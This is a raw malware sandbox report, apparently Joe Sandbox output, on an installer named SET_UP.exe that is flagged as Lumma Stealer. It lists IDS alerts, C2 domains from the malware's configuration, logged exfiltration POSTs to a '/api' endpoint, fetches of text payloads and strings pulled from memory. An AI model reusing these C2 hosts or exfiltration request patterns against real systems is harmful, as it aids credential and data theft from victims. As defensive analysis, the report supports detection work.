            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49755 -> 188.114.96.3:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: abruptyopsn.shop
            Source: Malware configuration extractorURLs: nearycrepso.shop
            Source: Malware configuration extractorURLs: framekgirus.shop
            Source: Malware configuration extractorURLs: tirepublicerj.shop
            Source: Malware configuration extractorURLs: rabidcowse.shop
            Source: Malware configuration extractorURLs: cutefingeuker.click
            Source: Malware configuration extractorURLs: wholersorie.shop
            Source: Malware configuration extractorURLs: cloudewahsj.shop
            Source: Malware configuration extractorURLs: noisycuttej.shop
            Source: Joe Sandbox ViewIP Address: 104.21.37.128 104.21.37.128
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 185.161.251.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 104.21.37.128:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49758
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W6VF34HWOYVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KOSWQ2L6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8725Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ENMNWZ6IBCXER1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OWVLA8FA5OYYV1IS08User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 969Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T5N7UV5S1D0O744WPN5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1110Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: cutefingeuker.click
            Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
            Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
            Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
            Source: global trafficDNS traffic detected: DNS query: cutefingeuker.click
            Source: global trafficDNS traffic detected: DNS query: cegu.shop
            Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cutefingeuker.click
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.securetrust.com/0?
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.trustwave.com/06
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0:
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.vikingcloud.com/0A
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtk9
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/u
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.clGS
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909305895.0000000000822000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909274602.000000000081F000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/
            Source: SET_UP.exe, 00000000.00000003.1929874990.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/&&.
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/8
            Source: SET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/QQ
            Source: SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/api
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/api#
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/api1
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/apig
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/buL
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/bub
            Source: SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/pi
            Source: SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click/pi1
            Source: SET_UP.exe, 00000000.00000002.2021753399.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cutefingeuker.click:443/api
            Source: SET_UP.exeString found in binary or memory: https://dfgh.online/invo
            Source: powershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
            Source: powershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SET_UP.exe, 00000000.00000003.1968564993.0000000003A18000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965099584.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1966990463.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1969681725.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1968481399.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1971285796.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964736489.0000000003AEA000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977051010.0000000003A1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1967202416.0000000003BFF000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1972519369.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1967833052.0000000003B1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965800504.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1963898121.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973060526.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1966880719.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965024411.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1968373832.0000000003A1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964648647.0000000003A17000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1970689425.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964384270.0000000003A14000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2019740699.0000000003A1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/L
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/Y
            Source: SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtFmsZr
            Source: SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1$m
            Source: SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
            Source: SET_UP.exe, 00000000.00000003.1861986622.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: SET_UP.exe, 00000000.00000003.1861986622.000000000376C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1862063794.0000000003765000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873500798.0000000003765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
